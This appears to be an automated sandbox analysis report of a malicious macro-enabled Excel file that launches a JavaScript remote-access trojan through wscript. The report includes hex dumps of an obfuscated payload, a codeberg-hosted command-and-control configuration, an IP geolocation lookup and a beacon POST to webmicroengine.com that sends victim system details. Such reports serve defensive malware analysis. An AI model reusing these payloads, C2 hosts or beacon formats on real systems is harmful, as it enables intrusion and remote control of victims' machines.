                                                                                                                                                                                          2023-12-06 17:18:01 UTC1378INData Raw: 78 34 32 5c 78 37 30 5c 78 35 33 5c 78 36 43 5c 78 37 37 5c 78 36 39 5c 78 34 43 5c 78 35 33 5c 78 36 46 5c 78 32 46 5c 78 35 37 5c 78 35 34 5c 78 35 41 5c 78 36 41 5c 78 34 42 5c 78 35 3f 34 45 5c 78 33 33 5c 78 35 31 5c 78 36 45 5c 78 35 32 5c 78 37 39 5c 78 34 44 5c 78 37 41 5c 78 35 3f 37 36 5c 78 35 3f 37 41 5c 78 36 34 5c 78 37 33 5c 78 35 36 5c 78 34 3f 35 41 5c 78 36 39 5c 78 34 43 5c 78 36 41 5c 78 36 43 5c 78 36 37 5c 78 34 41 5c 78 36 42 5c 78 33 31 5c 78 34 31 5c 78 35 34 5c 78 37 41 5c 78 35 32 5c 78 36 36 5c 78 34 44 5c 78 36 42 5c 78 37 38 5c 78 34 43 5c 78 35 37 5c 78 32 33 5c 78 36 43 5c 78 36 33 5c 78 35 38 5c 78 34 37 5c 78 36 33 5c 78 33 37 5c 78 36 31 5c 78 36 45 5c 78 33 31 5c 78 37 3f 35 36 5c 78 35 38 5c 78 35 36 5c 78 35 31 5c 78
                                                                                                                                                                                          Data Ascii: x42\x70\x53\x6C\x77\x69\x4C\x53\x6F\x2F\x57\x54\x5A\x6A\x4B\x5?4E\x33\x51\x6E\x52\x79\x4D\x7A\x5?76\x5?7A\x64\x73\x56\x4?5A\x69\x4C\x6A\x6C\x67\x4A\x6B\x31\x41\x54\x7A\x52\x66\x4D\x6B\x78\x4C\x57\x23\x6C\x63\x58\x47\x63\x37\x61\x6E\x31\x7?56\x58\x56\x51\x
                                                                                                                                                                                          2023-12-06 17:18:01 UTC1378INData Raw: 38 5c 78 34 37 5c 78 35 36 5c 78 36 46 5c 78 36 32 5c 78 36 43 5c 78 36 42 5c 78 36 39 5c 78 34 43 5c 78 34 33 5c 78 34 39 5c 78 37 30 5c 78 35 3f 36 44 5c 78 34 41 5c 78 32 42 5c 78 34 41 5c 78 36 41 5c 78 36 30 5c 78 37 34 5c 78 35 31 5c 78 35 34 5c 78 34 45 5c 78 34 31 5c 78 35 38 5c 78 32 33 5c 78 33 39 5c 78 35 38 5c 78 35 36 5c 78 36 45 5c 78 34 41 5c 78 35 31 5c 78 34 42 5c 78 34 3f 36 34 5c 78 36 41 5c 78 35 30 5c 78 34 3f 35 39 5c 78 33 37 5c 78 35 33 5c 78 33 33 5c 78 37 38 5c 78 36 45 5c 78 34 43 5c 78 35 33 5c 78 36 33 5c 78 37 36 5c 78 35 38 5c 78 36 41 5c 78 35 39 5c 78 36 41 5c 78 34 43 5c 78 36 41 5c 78 34 36 5c 78 34 41 5c 78 35 34 5c 78 35 36 5c 78 35 36 5c 78 37 33 5c 78 34 42 5c 78 33 33 5c 78 32 33 5c 78 37 31 5c 78 36 33 5c 78 35 36
                                                                                                                                                                                          Data Ascii: 8\x47\x56\x6F\x62\x6C\x6B\x69\x4C\x43\x49\x70\x5?6D\x4A\x2B\x4A\x6A\x60\x74\x51\x54\x4E\x41\x58\x23\x39\x58\x56\x6E\x4A\x51\x4B\x4?64\x6A\x50\x4?59\x37\x53\x33\x78\x6E\x4C\x53\x63\x76\x58\x6A\x59\x6A\x4C\x6A\x46\x4A\x54\x56\x56\x73\x4B\x33\x23\x71\x63\x56
                                                                                                                                                                                          2023-12-06 17:18:01 UTC1378INData Raw: 3f 36 44 5c 78 33 31 5c 78 32 36 5c 78 35 34 5c 78 35 37 5c 78 32 36 5c 78 33 36 5c 78 34 43 5c 78 34 36 5c 78 36 30 5c 78 33 32 5c 78 36 34 5c 78 33 32 5c 78 34 36 5c 78 36 30 5c 78 34 41 5c 78 34 38 5c 78 37 34 5c 78 35 31 5c 78 35 36 5c 78 35 38 5c 78 34 32 5c 78 36 33 5c 78 34 39 5c 78 36 45 5c 78 32 33 5c 78 37 36 5c 78 35 39 5c 78 37 41 5c 78 37 34 5c 78 34 38 5c 78 34 41 5c 78 35 34 5c 78 33 39 5c 78 37 30 5c 78 34 44 5c 78 34 36 5c 78 36 43 5c 78 35 37 5c 78 36 32 5c 78 36 45 5c 78 34 3f 37 30 5c 78 34 43 5c 78 36 42 5c 78 35 36 5c 78 37 31 5c 78 35 38 5c 78 32 33 5c 78 34 41 5c 78 35 32 5c 78 35 33 5c 78 37 39 5c 78 34 45 5c 78 36 45 5c 78 34 39 5c 78 36 39 5c 78 37 37 5c 78 36 39 5c 78 35 30 5c 78 34 38 5c 78 36 46 5c 78 37 34 5c 78 34 43 5c 78
                                                                                                                                                                                          Data Ascii: ?6D\x31\x26\x54\x57\x26\x36\x4C\x46\x60\x32\x64\x32\x46\x60\x4A\x48\x74\x51\x56\x58\x42\x63\x49\x6E\x23\x76\x59\x7A\x74\x48\x4A\x54\x39\x70\x4D\x46\x6C\x57\x62\x6E\x4?70\x4C\x6B\x56\x71\x58\x23\x4A\x52\x53\x79\x4E\x6E\x49\x69\x77\x69\x50\x48\x6F\x74\x4C\x
                                                                                                                                                                                          2023-12-06 17:18:01 UTC1378INData Raw: 45 5c 78 36 43 5c 78 35 36 5c 78 37 41 5c 78 33 39 5c 78 35 38 5c 78 35 34 5c 78 34 33 5c 78 34 39 5c 78 37 33 5c 78 34 39 5c 78 36 42 5c 78 35 36 5c 78 36 45 5c 78 34 46 5c 78 34 3f 37 38 5c 78 35 36 5c 78 35 33 5c 78 35 3f 33 39 5c 78 35 37 5c 78 34 39 5c 78 34 38 5c 78 34 3f 37 39 5c 78 35 33 5c 78 36 44 5c 78 36 37 5c 78 37 33 5c 78 34 45 5c 78 35 33 5c 78 34 3f 32 33 5c 78 36 3f 33 31 5c 78 37 33 5c 78 36 45 5c 78 36 36 5c 78 34 33 5c 78 37 30 5c 78 36 42 5c 78 35 30 5c 78 35 37 5c 78 34 32 5c 78 35 41 5c 78 35 38 5c 78 35 3f 33 31 5c 78 34 46 5c 78 34 39 5c 78 32 33 5c 78 34 44 5c 78 33 32 5c 78 35 30 5c 78 36 44 5c 78 37 37 5c 78 36 42 5c 78 35 38 5c 78 34 36 5c 78 37 38 5c 78 35 39 5c 78 36 34 5c 78 36 43 5c 78 34 32 5c 78 32 33 5c 78 35 39 5c 78
                                                                                                                                                                                          Data Ascii: E\x6C\x56\x7A\x39\x58\x54\x43\x49\x73\x49\x6B\x56\x6E\x4F\x4?78\x56\x53\x5?39\x57\x49\x48\x4?79\x53\x6D\x67\x73\x4E\x53\x4?23\x6?31\x73\x6E\x66\x43\x70\x6B\x50\x57\x42\x5A\x58\x5?31\x4F\x49\x23\x4D\x32\x50\x6D\x77\x6B\x58\x46\x78\x59\x64\x6C\x42\x23\x59\x
                                                                                                                                                                                          2023-12-06 17:18:01 UTC1378INData Raw: 41 5c 78 34 45 5c 78 37 34 5c 78 34 42 5c 78 34 37 5c 78 37 34 5c 78 36 39 5c 78 35 38 5c 78 34 33 5c 78 34 41 5c 78 36 45 5c 78 36 3f 35 3f 34 41 5c 78 36 32 5c 78 35 41 5c 78 35 36 5c 78 35 31 5c 78 33 34 5c 78 36 36 5c 78 34 34 5c 78 34 32 5c 78 36 31 5c 78 36 34 5c 78 35 3f 33 34 5c 78 32 42 5c 78 35 39 5c 78 33 31 5c 78 36 37 5c 78 37 34 5c 78 35 30 5c 78 33 33 5c 78 34 41 5c 78 37 37 5c 78 34 42 5c 78 35 33 5c 78 34 32 5c 78 33 39 5c 78 34 43 5c 78 33 33 5c 78 34 3f 37 33 5c 78 34 46 5c 78 36 42 5c 78 36 38 5c 78 34 34 5c 78 34 41 5c 78 33 31 5c 78 34 41 5c 78 36 3f 35 32 5c 78 33 31 5c 78 34 3f 32 36 5c 78 36 34 5c 78 36 44 5c 78 35 39 5c 78 37 31 5c 78 35 36 5c 78 36 39 5c 78 34 39 5c 78 37 33 5c 78 34 39 5c 78 36 45 5c 78 33 31 5c 78 35 37 5c 78
                                                                                                                                                                                          Data Ascii: A\x4E\x74\x4B\x47\x74\x69\x58\x43\x4A\x6E\x6?5?4A\x62\x5A\x56\x51\x34\x66\x44\x42\x61\x64\x5?34\x2B\x59\x31\x67\x74\x50\x33\x4A\x77\x4B\x53\x42\x39\x4C\x33\x4?73\x4F\x6B\x68\x44\x4A\x31\x4A\x6?52\x31\x4?26\x64\x6D\x59\x71\x56\x69\x49\x73\x49\x6E\x31\x57\x
                                                                                                                                                                                          2023-12-06 17:18:01 UTC1378INData Raw: 34 5c 78 37 37 5c 78 36 3f 34 33 5c 78 34 31 5c 78 36 38 5c 78 35 41 5c 78 35 36 5c 78 35 32 5c 78 34 38 5c 78 36 34 5c 78 37 39 5c 78 35 31 5c 78 36 41 5c 78 34 39 5c 78 36 39 5c 78 37 37 5c 78 36 39 5c 78 35 36 5c 78 35 37 5c 78 37 34 5c 78 37 31 5c 78 36 33 5c 78 33 31 5c 78 33 31 5c 78 34 36 5c 78 34 43 5c 78 37 39 5c 78 36 43 5c 78 36 31 5c 78 36 36 5c 78 34 3f 36 37 5c 78 33 32 5c 78 35 36 5c 78 34 36 5c 78 34 39 5c 78 36 45 5c 78 35 33 5c 78 37 41 5c 78 36 38 5c 78 34 37 5c 78 34 41 5c 78 34 34 5c 78 34 32 5c 78 34 34 5c 78 36 32 5c 78 35 33 5c 78 36 38 5c 78 35 37 5c 78 35 38 5c 78 36 43 5c 78 34 32 5c 78 33 37 5c 78 35 31 5c 78 35 33 5c 78 35 36 5c 78 33 36 5c 78 36 32 5c 78 32 33 5c 78 37 37 5c 78 33 39 5c 78 34 42 5c 78 33 33 5c 78 34 31 5c 78
                                                                                                                                                                                          Data Ascii: 4\x77\x6?43\x41\x68\x5A\x56\x52\x48\x64\x79\x51\x6A\x49\x69\x77\x69\x56\x57\x74\x71\x63\x31\x31\x46\x4C\x79\x6C\x61\x66\x4?67\x32\x56\x46\x49\x6E\x53\x7A\x68\x47\x4A\x44\x42\x44\x62\x53\x68\x57\x58\x6C\x42\x37\x51\x53\x56\x36\x62\x23\x77\x39\x4B\x33\x41\x
                                                                                                                                                                                          2023-12-06 17:18:01 UTC1378INData Raw: 3f 36 42 5c 78 33 39 5c 78 33 32 5c 78 35 39 5c 78 35 3f 35 41 5c 78 36 30 5c 78 35 31 5c 78 33 32 5c 78 36 43 5c 78 34 43 5c 78 36 3f 33 33 5c 78 34 3f 36 38 5c 78 35 30 5c 78 34 36 5c 78 33 39 5c 78 36 3f 35 3f 35 33 5c 78 35 36 5c 78 34 46 5c 78 35 39 5c 78 34 33 5c 78 35 32 5c 78 37 37 5c 78 34 44 5c 78 34 36 5c 78 36 46 5c 78 33 39 5c 78 34 45 5c 78 35 38 5c 78 37 38 5c 78 34 31 5c 78 34 46 5c 78 35 33 5c 78 33 31 5c 78 36 45 5c 78 36 36 5c 78 36 42 5c 78 33 31 5c 78 37 41 5c 78 35 37 5c 78 37 41 5c 78 36 33 5c 78 37 39 5c 78 34 42 5c 78 33 31 5c 78 33 31 5c 78 34 33 5c 78 35 33 5c 78 36 44 5c 78 35 32 5c 78 36 33 5c 78 35 38 5c 78 34 38 5c 78 36 37 5c 78 33 37 5c 78 36 34 5c 78 33 31 5c 78 35 36 5c 78 36 43 5c 78 34 41 5c 78 33 32 5c 78 36 30 5c 78
                                                                                                                                                                                          Data Ascii: ?6B\x39\x32\x59\x5?5A\x60\x51\x32\x6C\x4C\x6?33\x4?68\x50\x46\x39\x6?5?53\x56\x4F\x59\x43\x52\x77\x4D\x46\x6F\x39\x4E\x58\x78\x41\x4F\x53\x31\x6E\x66\x6B\x31\x7A\x57\x7A\x63\x79\x4B\x31\x31\x43\x53\x6D\x52\x63\x58\x48\x67\x37\x64\x31\x56\x6C\x4A\x32\x60\x
                                                                                                                                                                                          2023-12-06 17:18:01 UTC1378INData Raw: 78 36 38 5c 78 36 33 5c 78 34 33 5c 78 34 3f 32 33 5c 78 34 44 5c 78 36 39 5c 78 34 39 5c 78 37 33 5c 78 34 39 5c 78 36 45 5c 78 34 36 5c 78 36 33 5c 78 34 39 5c 78 36 45 5c 78 33 31 5c 78 35 34 5c 78 35 38 5c 78 34 33 5c 78 34 41 5c 78 36 44 5c 78 35 41 5c 78 36 43 5c 78 36 37 5c 78 33 36 5c 78 35 32 5c 78 33 31 5c 78 33 39 5c 78 34 46 5c 78 35 37 5c 78 35 33 5c 78 34 39 5c 78 37 33 5c 78 34 39 5c 78 36 43 5c 78 36 33 5c 78 32 46 5c 78 36 32 5c 78 35 3f 36 46 5c 78 36 41 5c 78 35 32 5c 78 32 33 5c 78 34 36 5c 78 35 32 5c 78 35 33 5c 78 34 34 5c 78 36 37 5c 78 37 32 5c 78 34 42 5c 78 35 34 5c 78 33 31 5c 78 35 41 5c 78 35 39 5c 78 34 3f 35 31 5c 78 33 36 5c 78 35 30 5c 78 34 36 5c 78 37 37 5c 78 36 39 5c 78 36 34 5c 78 35 37 5c 78 34 45 5c 78 37 3f 35 41
                                                                                                                                                                                          Data Ascii: x68\x63\x43\x4?23\x4D\x69\x49\x73\x49\x6E\x46\x63\x49\x6E\x31\x54\x58\x43\x4A\x6D\x5A\x6C\x67\x36\x52\x31\x39\x4F\x57\x53\x49\x73\x49\x6C\x63\x2F\x62\x5?6F\x6A\x52\x23\x46\x52\x53\x44\x67\x72\x4B\x54\x31\x5A\x59\x4?51\x36\x50\x46\x77\x69\x64\x57\x4E\x7?5A


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          11192.168.2.1649737217.197.91.1454434988C:\Windows\System32\wscript.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2023-12-06 17:18:10 UTC380OUTGET /mikecollines27288292/crispy-palm-tree/raw/branch/main/crispy.txt HTTP/1.1
                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                          Accept-Language: en-ch
                                                                                                                                                                                          UA-CPU: AMD64
                                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                          Host: codeberg.org
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          2023-12-06 17:18:11 UTC833INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 61 63 63 65 73 73 2d 63 6f 6e 74 72 6f 6c 2d 65 78 70 6f 73 65 2d 68 65 61 64 65 72 73 3a 20 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 33 30 30 0d 0a 63 6f 6e 74 65 6e 74 2d 64 69 73 70 6f 73 69 74 69 6f 6e 3a 20 69 6e 6c 69 6e 65 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 63 72 69 73 70 79 2e 74 78 74 22 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 55 54 46 2d 38 27 27 63 72 69 73 70 79 2e 74 78 74 0d 0a 63 6f 6e 74 65 6e 74 2d 6c 65 6e 67 74 68 3a 20 38 36 0d 0a 63 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 65 74 61 67 3a 20 22
                                                                                                                                                                                          Data Ascii: HTTP/1.1 200 OKaccess-control-expose-headers: Content-Dispositioncache-control: private, max-age=300content-disposition: inline; filename="crispy.txt"; filename*=UTF-8''crispy.txtcontent-length: 86content-type: text/plain; charset=utf-8etag: "
                                                                                                                                                                                          2023-12-06 17:18:11 UTC86INData Raw: 38 33 28 2b 29 31 36 39 28 2b 29 31 37 36 28 2b 29 35 33 28 3d 29 34 30 30 30 28 2a 29 31 30 30 30 28 2a 29 32 30 30 30 28 2a 29 31 30 30 30 28 26 29 68 74 74 70 73 3a 2b 2b 77 65 62 6d 69 63 72 6f 65 6e 67 69 6e 65 2e 74 6f 2b 69 6e 64 65 78 2e 61 73 70 78
                                                                                                                                                                                          Data Ascii: 83(+)169(+)176(+)53(=)4000(*)1000(*)2000(*)1000(&)https:++webmicroengine.to+index.aspx


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          12192.168.2.164973834.117.59.814437120C:\Windows\System32\wscript.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2023-12-06 17:18:18 UTC275OUTGET /json HTTP/1.1
                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36
                                                                                                                                                                                          Accept-Language: en-ch
                                                                                                                                                                                          UA-CPU: AMD64
                                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                                          Host: ipinfo.io
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          2023-12-06 17:18:18 UTC402INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 61 63 63 65 73 73 2d 63 6f 6e 74 72 6f 6c 2d 61 6c 6c 6f 77 2d 6f 72 69 67 69 6e 3a 20 2a 0d 0a 78 2d 63 6f 6e 74 65 6e 74 2d 74 79 70 65 2d 6f 70 74 69 6f 6e 73 3a 20 6e 6f 73 6e 69 66 66 0d 0a 63 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 37 31 0d 0a 64 61 74 65 3a 20 57 65 64 2c 20 30 36 20 44 65 63 20 32 30 32 33 20 31 37 3a 31 38 3a 31 38 20 47 4d 54 0d 0a 78 2d 65 6e 76 6f 79 2d 75 70 73 74 72 65 61 6d 2d 73 65 72 76 69 63 65 2d 74 69 6d 65 3a 20 33 0d 0a 73 74 72 69 63 74 2d 74 72 61 6e 73 70 6f 72 74 2d 73 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65
                                                                                                                                                                                          Data Ascii: HTTP/1.1 200 OKaccess-control-allow-origin: *x-content-type-options: nosniffcontent-type: application/json; charset=utf-8Content-Length: 271date: Wed, 06 Dec 2023 17:18:18 GMTx-envoy-upstream-service-time: 3strict-transport-security: max-age
                                                                                                                                                                                          2023-12-06 17:18:18 UTC271INData Raw: 7b 0a 20 20 22 69 70 22 3a 20 22 31 30 32 2e 31 36 35 2e 34 38 2e 38 33 22 2c 0a 20 20 22 63 69 74 79 22 3a 20 22 57 61 73 68 69 6e 67 74 6f 6e 22 2c 0a 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 57 61 73 68 69 6e 67 74 6f 6e 2c 20 44 2e 43 2e 22 2c 0a 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 22 6c 6f 63 22 3a 20 22 33 38 2e 39 30 32 39 2c 2d 37 37 2e 30 33 36 31 22 2c 0a 20 20 22 6f 72 67 22 3a 20 22 41 53 31 37 34 20 43 6f 67 65 6e 74 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 22 2c 0a 20 20 22 70 6f 73 74 61 6c 22 3a 20 22 32 30 35 32 37 22 2c 0a 20 20 22 74 69 6d 65 7a 6f 6e 65 22 3a 20 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 0a 20 20 22 72 65 61 64 6d 65 22 3a 20 22 68 74 74 70 73 3a 2f 2f 69 70 69 6e 66 6f 2e 69
                                                                                                                                                                                          Data Ascii: { "ip": "102.165.48.83", "city": "Washington", "region": "Washington, D.C.", "country": "US", "loc": "38.9029,-77.0361", "org": "AS174 Cogent Communications", "postal": "20527", "timezone": "America/New_York", "readme": "https://ipinfo.i


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          13192.168.2.1649739190.123.45.874437120C:\Windows\System32\wscript.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2023-12-06 17:18:19 UTC427OUTPOST /index.php HTTP/1.1
                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                          user-agent: DECFLWSHRAT|B81A4609|377142|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 6/12/2023|DECFL - JavaScript-v3.4|US:US/Washington
                                                                                                                                                                                          TARGET-URL: is-ready
                                                                                                                                                                                          TARGET-IP: 172.86.79.202
                                                                                                                                                                                          TARGET-PORT: 8000
                                                                                                                                                                                          Accept-Language: en-ch
                                                                                                                                                                                          UA-CPU: AMD64
                                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                                          Host: webmicroengine.com
                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Cache-Control: no-cache


                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                          Target ID:0
                                                                                                                                                                                          Start time:18:16:16
                                                                                                                                                                                          Start date:06/12/2023
                                                                                                                                                                                          Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                          Commandline:C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\Techspan Statement.xlsm
                                                                                                                                                                                          Imagebase:0x30000
                                                                                                                                                                                          File size:53'161'064 bytes
                                                                                                                                                                                          MD5 hash:4A871771235598812032C822E6F68F19
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Reputation:moderate
                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                          Target ID:7
                                                                                                                                                                                          Start time:18:17:35
                                                                                                                                                                                          Start date:06/12/2023
                                                                                                                                                                                          Path:C:\Windows\splwow64.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:C:\Windows\splwow64.exe 12288
                                                                                                                                                                                          Imagebase:0x7ff659350000
                                                                                                                                                                                          File size:163'840 bytes
                                                                                                                                                                                          MD5 hash:77DE7761B037061C7C112FD3C5B91E73
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Reputation:moderate
                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                          Target ID:9
                                                                                                                                                                                          Start time:18:18:02
                                                                                                                                                                                          Start date:06/12/2023
                                                                                                                                                                                          Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                                          Imagebase:0x7ff7d6de0000
                                                                                                                                                                                          File size:496'640 bytes
                                                                                                                                                                                          MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Reputation:moderate
                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                          Target ID:10
                                                                                                                                                                                          Start time:18:18:02
                                                                                                                                                                                          Start date:06/12/2023
                                                                                                                                                                                          Path:C:\Windows\System32\wscript.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:C:\Windows\System32\wscript.exe //b "C:\Users\user\5DWDMMR9NH2K.JS"
                                                                                                                                                                                          Imagebase:0x7ff607cb0000
                                                                                                                                                                                          File size:170'496 bytes
                                                                                                                                                                                          MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          Target ID:11
                                                                                                                                                                                          Start time:18:18:10
                                                                                                                                                                                          Start date:06/12/2023
                                                                                                                                                                                          Path:C:\Windows\System32\wscript.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\OracleX\5DWDMMR9NH2K.JS
                                                                                                                                                                                          Imagebase:0x7ff607cb0000
                                                                                                                                                                                          File size:170'496 bytes
                                                                                                                                                                                          MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                          No disassembly